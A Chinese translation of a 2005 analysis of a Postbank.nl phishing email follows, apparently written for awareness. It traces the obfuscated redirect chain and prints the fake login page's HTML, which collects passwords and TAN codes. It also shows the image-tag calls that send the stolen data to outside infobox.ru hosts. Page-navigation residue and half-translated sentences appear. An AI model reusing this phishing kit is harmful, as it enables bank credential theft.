简单介绍:
我每天都会接到很多的企图进行网络钓鱼的电子邮件,绝大部分都被我一眼认出来是广告后直接塞到了垃圾邮件文件夹里了。而一些不大好辨认的,我都通过手工检测后也搞掂了。今天在翻阅垃圾邮件文件夹欣赏我的成果时,发现了一个企图诱骗用户提交Postbank.nl信用信息的骗局。我一下就被他的阴险技巧吸引了,事实上这也是我第一次看见伪装成Postbank的网络钓鱼。Postbank是荷兰最大的银行之一,也是那儿安全性最差劲的银行之一。其他的银行已经开始采用数字凭证(有的时候叫随机读卡)了,而Postbank仍然在使用的是用户名/密码加TAN码的方式来登录。当Postbank的客户们需要做交易或者是查询的时候仅仅需要输入用户名密码和一个TAN码就可以了,而每当客户的TAN码用完后他(她)就会收到一批新的。Postbank的另外一种电脑化银行业务的方式是使用Girotel Onlin,顾客如果想要访问自己的帐号必须输入他们的Girotelnumber和Codenumber以及GIN码。
本文仅仅是从技术的角度去分析这个案例。虽然我的分析可能会给网络钓鱼的实施者们一些启发,但是本质的出发点是为了让大家了解这种伎俩。就在我开始写这篇分析后的数小时后,这个案例也受到了荷兰各媒体的广泛关注。在荷兰政府的计算机应急响应小组收到关于此案件的警报后,一些大型的新闻站点和无线广播相继开始报道。据说当前已经出现了几个针对不同站点的变种。不过我能只对我自己收到的这份进行分析。
我收到的e-mail:
好了,我们从我收到的这封e-mail开始吧。我给出完整的版本,唯一的区别就是我去掉了一些空行并转换为纯文本格式,另外对一些敏感信息做了屏蔽。
Return-Path: <
[email protected]>
Received: from vas02.wanadoo.nl (vas02.wanadoo.nl [194.134.35.217])
by pop1.euronet.nl (Postfix) with ESMTP id 46E662ACBCA
for <
[email protected]onet.nl>; Sat, 4 Jun 2005 04:04:07 +0200 (MET DST)
Received: from localhost (localhost.localdomain [127.0.0.1])
by vas02.wanadoo.nl (Postfix) with ESMTP id 37CB92A9561
for <
[email protected]onet.nl>; Sat, 4 Jun 2005 04:04:07 +0200 (CEST)
Received: from vas02.wanadoo.nl ([127.0.0.1])
by localhost (vas02.wanadoo.nl [127.0.0.1]) (amavisd-new-wb5, port 10024)
with ESMTP id 12540-53 for <
[email protected]onet.nl>;
Sat, 4 Jun 2005 04:04:05 +0200 (CEST)
Received: from mx1.euronet.nl (mx1.euronet.nl [194.134.35.134])
by vas02.wanadoo.nl (Postfix) with ESMTP id 7BCB92A9555
for <************@euronet.nl>; Sat, 4 Jun 2005 04:04:05 +0200 (CEST)
Received: from 132-8.200-68.tampabay.res.rr.com (132-8.200-68.tampabay.res.rr.com [68.200.8.132])
by mx1.euronet.nl (Postfix) with SMTP id 9359C58320
for <************@euronet.nl>; Sat, 4 Jun 2005 03:56:41 +0200 (MEST)
Message-ID: <
[email protected]>
From: Postbank.nl <
[email protected]>
To: ************@euronet.nl
Subject: ***SPAM*** =?iso-8859-1?B?UG9zdGJhbmsgRW1haWwgVmVyaWZpY2F0aW9uIC0gc2NoZXJwZW5zZWVsQGV1cm9u?=
=?iso-8859-1?B?ZXQubmw=?=
Date: Sun, 29 May 2005 22:32:26 +0000
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="----=_NextPart_000_0000_42715370.3CB1ABCF"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook EXPress V6.00.2900.2180
X-MimeOLE: ProdUCed By Microsoft MimeOLE V6.00.2900.2180
X-Virus-Scanned: Wanadoo VAS
X-Spam-Status: Yes, hits=6.5 tagged_above=4.9 required=4.9 tests=BAYES_44,
CLICK_BELOW, DATE_IN_PAST_96_XX, FORGED_OUTLOOK_TAGS, Html_MESSAGE,
HTTP_EXCESSIVE_ESCAPES, RCVD_IN_LSORBS
X-Spam-Level: *******
X-Spam-Flag: YES
X-UIDL: 18d4c6eb5308141f578487627c916740
Status: R
X-Status: NC
X-KMail-EncryptionState:
X-KMail-SignatureState:
X-KMail-MDN-Sent:
This is a multi-part message in MIME format.
------=_NextPart_000_0000_42715370.3CB1ABCF
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_EF4ABF4E.C7EC9C49"
------=_NextPart_001_0001_EF4ABF4E.C7EC9C49
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
------=_NextPart_001_0001_EF4ABF4E.C7EC9C49
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Dear Postbank Customer,
This email was sent by the Postbank server to verify your e-mail address. You must complete this process by
clicking on the link below and entering in the small window your Postbank online Access details. This is done for
your protection - because some of our members no longer have access to their email addresses and we must verify it.
To verify your e-mail address, click on the link below:
<a href="http://www.google.es/url?q=http://go.msn.com/HML/1/5.asp?target=http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/" target=_blank>http://www.postbank.nl/gRK6QnraG6FTLfFmTNNbX68U7rj8Q22oyqyIKv8qBXCeGv0TJYa0w9g6c6wih2g3</a>
------=_NextPart_001_0001_EF4ABF4E.C7EC9C49--
------=_NextPart_000_0000_42715370.3CB1ABCF--
你可以看见,这个垃圾邮件已经被我ISP(Wanadoo.nl邮件服务器)的SpamAssassin软件标识成了广告,原因是:
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
BAYES_44, CLICK_BELOW, DATE_IN_PAST_96_XX, FORGED_OUTLOOK_TAGS, HTML_MESSAGE,HTTP_EXCESSIVE_ESCAPES, RCVD_IN_LSORBS
如果转换成自然语言的可读格式意思就是:
此封e-mail被确认成广告的可能性在44-50%,软件作者提醒用户点击下面的链接,此e-mail是在96个小时以前更新的,这封e- mail包含伪造的Outlook标签,这封e-mail使用HTML格式而并非纯文本,邮件体内包含很多没必要的链接并且发送者处于SORBS (Spam and Open Relay Blocking System)的黑名单里。
这个e-mail是从132-8.200-68.tampabay.res.rr.com发送过来的,解析地址是68.200.8.132。主机名中的tampabay可能暗示着这个服务器应该是在美国佛罗里达州的Tampa Bay。在本文撰写的过程中这个主机无法ping通,而通过对全部端口的扫描我们得知其开了一些常见的端口25/smtp、80/http、 1080/socks、3128/squid-http和8080/http-proxy。rr.com 的所有者是全美最大的电缆宽带ISP之一的Road Runner。Road Runner目前仍然提供拨号网络服务,不过大部分已经提供托管业务了。我现在最好的估计就是这信息是通过其中的一台服务器发送的,也许因为这个目前或者曾经是军方配置的代理,提供了smtp转发,或者一个木马机器人网络的受害者,或者提供了wifi访问。不过现在我们已经可以把发送者的物理地址锁定在美国佛罗里达州的Tampa Bay。
下面我们在body之前先注意一下e-mail的发送者是Postbank.nl <
[email protected]>,BenedettaBruno看起来像一个意大利人的名字。这批网络钓鱼的e-mail都是以意大利名字发送的。
OK,现在我们来看body部分。当看见这e-mail的第一反映就是它没有按照正确的HTML格式。我使用的Linux下的Kmail客户端没有认出这信息是HTML格式,因此没有允许我直接查看。原因很可能是body部分被压缩到了几个MIME头里,它是一个畸形的多段信息。
信中要求Postbank客户(或者说所有的阅读者,比如我并不是Postbank的客户)点击一个链接并提交他们的Postbank信用帐户登录信息,以此来校检他们的e-mail地址。如果这些网络钓鱼诡计的实施者们使用荷兰语来写这封e-mail,那么诈骗的成功率将更加高,所以我基本推断可以排除骗子是荷兰语系的本地人。好,下面让我们看看他们提供的链界:
<a href="http://www.google.es/url?q=http://go.msn.com/HML/1/5.asp?target=http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/" target=_blank>http://www.postbank.nl/gRK6QnraG6FTLfFmTNNbX68U7rj8Q22oyqyIKv8qBXCeGv0TJYa0w9g6c6wih2g3</a>
如果受害者e-mail客户端的HTML代码显示正常,将只能看见
http://www.postbank.nl/gRK6QnraG6FTLfFmTNNbX68U7rj8Q22oyqyIKv8qBXCeGv0TJYa0w9g6c6wih2g3
这一部分,而事实上在Postbank站点URL的后面是一个与我们所看见的部分毫不相关的地址,而我估计这仅仅是让地址看起来比较可信。总之,最后一个部分的链界是并非有害的部分,它其实只是一个有害链接的幌子。正如我们所看见的那样,发送者采取了两个转向。首先受害者被引向了Spanish Google,而这个链接引导受害者继续转到了MSN,最终指到了http://%68k%73chf%09%6f%2E%64%%09a%2ER%% 09U/,而Google和MSN的前缀只是为了迷惑受害者,让他们以为他们到达的是一个合法的地址。受害者很轻易就能认出Google和MSN,并且就不会把过多的注意力放在URL最后的陌生代码上了。
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Time to decode the final link destination. I coded together a very simple perl script based on Glenn Fleishman's code which I used to decode the URL.
揭露链接的最后地址的时间到了。
我使用邪恶八进制信息安全团队冰狐浪子的专用线上解码工具进行解码后情况如下:
http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/
Decode后得出了:
http://hkschf o.d% a.R% U/
URL地址:
Removing the whitespace and the excessive %-signs we get: http://hkschfo.da.RU/. Da.ru is a Russian free URL service where you can freely register a http://yourname.da.ru URL. Next thing to do is requesting the HTTP headers from hkschfo.da.ru:
把地址中的空格和多余的%标志去掉后得到地址http://hkschfo.da.RU/。这个地址是俄罗斯免费URL服务,你可以免费注册一个http://yourname.da.ru的URL。
然后是取得hkschfo.da.ru的HTTP头,也就是咱们说的Banner。
[vincent@matrix sandbox]$ telnet hkschfo.da.ru 80
Trying 195.161.113.135...
Connected to hkschfo.da.ru (195.161.113.135).
Escape character is '^]'.
HEAD / HTTP/1.0
Host:hkschfo.da.ru
HTTP/1.1 302 Found
Date: Sat, 04 Jun 2005 18:11:14 GMT
Server: Apache/1.3.9 (Unix) da.ru/1.2/DeathMatch
Location: http://dlkrexae.nm.ru/
Connection: close
Content-Type: text/html
As you can see the visitor is directly redirected via a 302 to dlkrexae.nm.ru. Nm.ru is also a free URL service but unfortunately I don't speak Russian so I can't exactly find out more about it. This is the third redirection! Let's examine the HTTP headers of dslkrexae.nm.ru:
看到了没?访问者被直接重定向到了dlkrexae.nm.ru。Nm.ru也是一个免费URL服务,但是很不幸我不会俄语,就不能搞的更清楚。这是第三个转向地址,让我们来看看dslkrexae.nm.ru的HTTP头。
[vincent@matrix sandbox]$ telnet dlkrexae.nm.ru 80
Trying 212.48.140.151...
Connected to dlkrexae.nm.ru (212.48.140.151).
Escape character is '^]'.
HEAD / HTTP/1.0
Host:dlkrexae.nm.ru
HTTP/1.1 200 OK
Date: Sat, 04 Jun 2005 17:38:11 GMT
Server: Apache/1.3.27 (Unix)
Last-Modified: Sat, 04 Jun 2005 11:44:45 GMT
ETag: "d283dc-1c8-42a1942d"
Accept-Ranges: bytes
Content-Length: 456
Connection: close
Content-Type: text/html; charset=windows-1251
最后,清楚了么?还不清楚?好,那咱们再看看源文件:
<HTML><HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.postbank.nl/">
<SCRIPT language=javascript>
// ensure top window
if (window != top)
{
top.location = window.location;
}
</SCRIPT>
<title></title></HEAD>
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
<BODY bgColor=#ffffff onload="window.open('welcome3.html', 'miqoo9',
'top=150,left=370,width=430,height=440,toolbar=no,location=no,scrollbars=no,resizable=no')">
</BODY></HTML>
<textarea style=display:none>
看!这就是诡计:用JavaScript弹出窗口把访问者重定向到第五个地址,也是最终目的地——Postbank的页面(www.postbank.nl)。而这个页面是在弹出窗口http://dlkrexae.nm.ru/welcome3.html中加载的。
<html lang="en">
<head>
<title>E-mail Verification - Postbank.nl</title>
<link rel="stylesheet" type="text/Css" href='http://www.heibai.net/article/info/[url]https://ib.national.com.au/nabib/scripts/nabstyle.css?id=008[/url]'>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<center>
<br>
<table width="430" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="150" valign="top"></td>
<td width="10"> </td>
<td width="100%">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="left"><center><img src=sim.gif></center></td>
</tr>
</table>
<hr size="1">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>
<form action="obr2.html" method="get" name=formulario>
<input type="hidden" name="go" value="hm">
<br>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="65%" align="left" valign="middle" colspan=2><center><font size=3 color=black>For Mijn Postbank.nl Clients:</font></center></td>
</tr>
<tr>
<td width="65%" align="left" valign="middle"><font size=3 color=black> UserID (Gebruikersnaam): </font></td>
<td align="left" valign="bottom"><input type="text" name="bankn" size="17" maxlength="30" class="inputtext" AUTOCOMPLETE="OFF" value=""></td>
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
</tr>
<tr><td height="12"> </td></tr>
<tr>
<td width="65%" align="left" valign="middle"><font size=3 color=black> PassWord (Wachtwoord): </font></td>
<td align="left" valign="bottom"><input type="password" name="word" size="17" maxlength="30" class="inputtext" AUTOCOMPLETE="OFF" value=""></td>
</tr>
<tr><td height="12"> </td></tr>
<tr>
<td width="65%" align="left" valign="middle" colspan=2><center><font size=3 color=black>For ALL Clients - enter your next three TAN codes:</font></center></td>
</tr>
<tr>
<td align="left" valign="bottom" colspan=2>
<center>
<table>
<tr>
<td align="center"><font size=2>volg N</font></td><td align="center"><font size=2>TAN</font></td><td align="center"> </td><td align="center"><font size=2>volg N</font></td><td align="center"><font size=2>TAN</font></td><td align="center"> </td><td align="center"><font size=2>volg N</font></td><td align="center"><font size=2>TAN</font></td>
</td>
</tr>
<tr>
<td align="center"><input type="text" name="vol1" size="4" maxlength="4" class="inputtext" AUTOCOMPLETE="OFF"
value=""></td><td align="center"><input type="text" name="pass1" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"> </td><td align="center"><input type="text" name="vol2" size="4" maxlength="4" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"><input type="text" name="pass2" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"> </td><td align="center"><input type="text" name="vol3" size="4" maxlength="4" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"><input type="text" name="pass3" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""><input type="hidden" name="ve" value="se"></td>
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
</td>
</tr></table>
</center>
</td>
</tr>
<tr><td height="12"> </td></tr>
<tr>
<td width="65%" align="left" valign="middle" colspan=2><center><font size=3 color=black>For Girotel Online Clients:</font></center></td>
</tr>
<tr>
<td align="left" valign="bottom" colspan=2>
<center>
<table>
<tr>
<td align="center"><font size=2>Girotelnummer</font></td><td align="center"> </td><td align="center"><font size=2>Codenummer</font></td><td align="center"> </td><td align="center"><font size=2>GIN-code</font></td>
</td>
</tr>
<tr>
<td align="center"><input type="text" name="girn" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"> </td><td align="center"><input type="password" name="conum" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"> </td><td align="center"><input type="password" name="gcod" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td></td>
</td>
</tr></table>
</center>
</td>
</tr>
<tr><td height="12"> </td></tr>
<tr>
<td width="57%"> </td>
<td align="right" class="body">
<input type="button" name="loginButton" value=" Verify " onclick=javascript:aceptar()>
</td>
</tr>
</table>
</form>
</td>
</tr>
</table>
</td>
<td width="10"> </td>
</tr>
</table>
</center>
</body>
<script>
function Submitir() {
document.formulario.submit();
}
function aceptar() {
if (document.formulario.vol1.value != '')
{
if (document.formulario.pass1.value != '')
{
if (document.formulario.vol2.value != '')
{
if (document.formulario.pass2.value != '')
{
if (document.formulario.vol3.value != '')
{
if (document.formulario.pass3.value != '')
{
Submitir();
}
else
{ alert("You need to enter your third VALID NEXT TAN code!");
document.formulario.pass3.focus();
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
}
}
else
{
alert("You need to enter Volgnummer of your third VALID NEXT TAN code!");
document.formulario.vol3.focus();
}
}
else
{
alert("You need to enter your second VALID NEXT TAN code!");
document.formulario.pass2.focus();
}
}
else
{
alert("You need to enter Volgnummer of your second VALID NEXT TAN code!");
document.formulario.vol2.focus();
}
}
else
{
alert("You need to enter your first VALID NEXT TAN code!");
document.formulario.pass1.focus();
}
}
else
{
alert("You need to enter Volgnummer of your first VALID NEXT TAN code!");
document.formulario.vol1.focus();
}
}
</script>
</html>
<textarea style=display:none>
The fact that this was added hours after the first e-mails were sent means that the scammers are still actively working to perfect their scam.
这就是诱骗Postbank客户输入他或者她的用户名,密码和TAN码的地方。通过我的分析,我发现了页面里被加入了新段。这个诡计同时也可以用在Postbank Girotel Online客户服务上,骗取Girotelnumber、Codenumber和GIN码。使用这些骗取来的信用信息,骗子们足以能够访问 Postbank客户的Girotel帐号。事实上这些是在首封邮件发送成功后被加上去的,也就意味着这些骗子们仍然在为完成骗局而活跃着。
让我门看看这个源代码,首先印入眼帘的就是包含了一个来自https地址的stylesheet:
<link rel="stylesheet" type="text/css" href='http://www.heibai.net/article/info/[url]https://ib.national.com.au/nabib/scripts/nabstyle.css?id=008[/url]'>
这是个反常的现象:stylesheet定义了很多classes但是welcome3.html却根本没有用。域名 national.com.au是属于澳大利亚国立银行的,这是一个坐落于澳大利亚,新西兰和英国的商业银行。为什么骗子们要用这么拙劣的手段去伪造一个 stylesheet标签呢?我想,估计是为了利用这银行的HTTPS弹出一个安全提示,用于迷惑受害者。一些受害者很容易被有安全提示的链接所迷惑,信任这样的链接是安全的。不过这种手段对Firefox是没有效果的,Firefox不会把它识别成安全页面。我也测试了最新版本的IE,其实最新的IE也可以把它的诡计识破。
我于是先把代码中的stylesheet标识去掉,因为我觉得他与咱们剩下要分析的关系不大。
<form action="obr2.html" method="get" name=formulario>
<input type="hidden" name="go" value="hm">
这里经过HTTP GET请求把数据送到obr2.html后到底发生了什么了呢。当用户填写了数据后,有一个隐藏的name="go"同时带了value="hm"。这个值是静态的,当我重复请求页面它是不会发生变化的。明显这个是由骗子们建立用来标识和记录是否有人中计点了重定向的链接和受害者来自哪里的,由于发送邮件的量非常大面非常广。
我们还发现JavaScript函数使用的是西班牙语名字:function Submitir(),document.formulario.submit()和function aceptar()。这里我们可以估计,骗子们可能说西班牙语,当然,也有可能是从互联网拷贝下来的例子代码。
处理方法:
Time to fill out some paperwork. Surfing through an anonymous open proxy server I entered some bogus information in the text boxes while I had a packetsniffer running on my gateway. This is what came through:
该做一些实事了。通过使用一个公开的匿名代理服务器访问互联网,我在这个文本框中输入了一些伪造的信息,同时在我的网关上安装运行了一个包嗅探设备。这就是通过他的数据:
GET http://dlkrexae.nm.ru/obr2.html?go=hm&bankn=jansen343&word=password007&vol1=23&pass1=452442&vol2=24&pass2=324233&vol3=25&pass3=234432&ve=se&girn=&
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
conum=&gcod= HTTP/1.1
果然不出我所料,我所填写的数据都通过了GET请求送到了obr2.html。下面就是obr2.html的源代码大致的样子:
<html>
<head>
<title></title>
<META HTTP-EQUIV="Refresh" CONTENT="1; URL=rezult.html">
</head>
<body>
<center><img width=1 height=1
src="http://z33455&
#046;infobox.ru/cg
i-bin/result/&
#105;mg10.cgi"><br><img width=1 height=1 src="http://z33431&
#046;infobox.ru/cg
i-bin/result/&
#105;mg10.cgi">
<br><br><br>
</b><br><br><b><br>
</center>
</body>
</html>
<textarea style=display:none>
页面obr2.html显示了两张图片,一秒后转向到了另外一个页面rezult.html。这两张图片的代码似乎是经过了HTML加密,译出后,图片的标识如下:
<img width=1 height=1 src="http://z33455.infobox.ru/cgi-bin/result/img10.cgi"><br><img width=1 height=1 src="http://z33431.infobox.ru/cgi-bin/result/img10.cgi">
其实他们的伎俩很简单:HTML中加载了两个CGI脚本作为图片。这就是数据通过GET发给了骗子的原因,当提交的时候这两个CGI起了作用。在这个过程中,传递的就是我刚才提交的伪造的Postbank信用帐户信息,很不幸的是我没有办法得到这两个CGI脚本。至于文件中包含了两个CGI脚本很有可能是为了防止出错,这里有一份我的包嗅探器记录到的请求:
GET http://z33431.infobox.ru/cgi-bin/result/img10.cgi HTTP/1.1
Host: z33431.infobox.ru
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Accept: image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://dlkrexae.nm.ru/obr2.html?go=hm&bankn=jansen343&word=password007&vol1=23&pass1=452442&vol2=24&pass2=324233&vol3=25&pass3=234432&ve=se&girn=
&conum=&gcod=
另外一份除了主机名以外也应该是十分相似的(z33455.infobox.ru,而不是z33431.infobox.ru), Infobox.ru是一个虚拟主机服务提供商,好象没有看见他提供免费的URL服务,不过提供了一个月的试用时间,而骗子们使用这个空间的可能性很大。
好了,做一个最后的总结。当页面转向完毕后,经过一秒钟才加载下一个重定向到rezult.html,这其实是在为那两张图片加载争取时间。下面就是rezult.html的原代码了:
<html>
<head>
<title>Your E-Mail Was Verified.</title>
</head>
<body>
<center>
<font size=3 color=red>
<br><br><br><br><b>Thank you.
</font>
<font size=3>
</b><br><br><b>Your E-Mail Address Was<br>Successful Verified.</b><br>
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]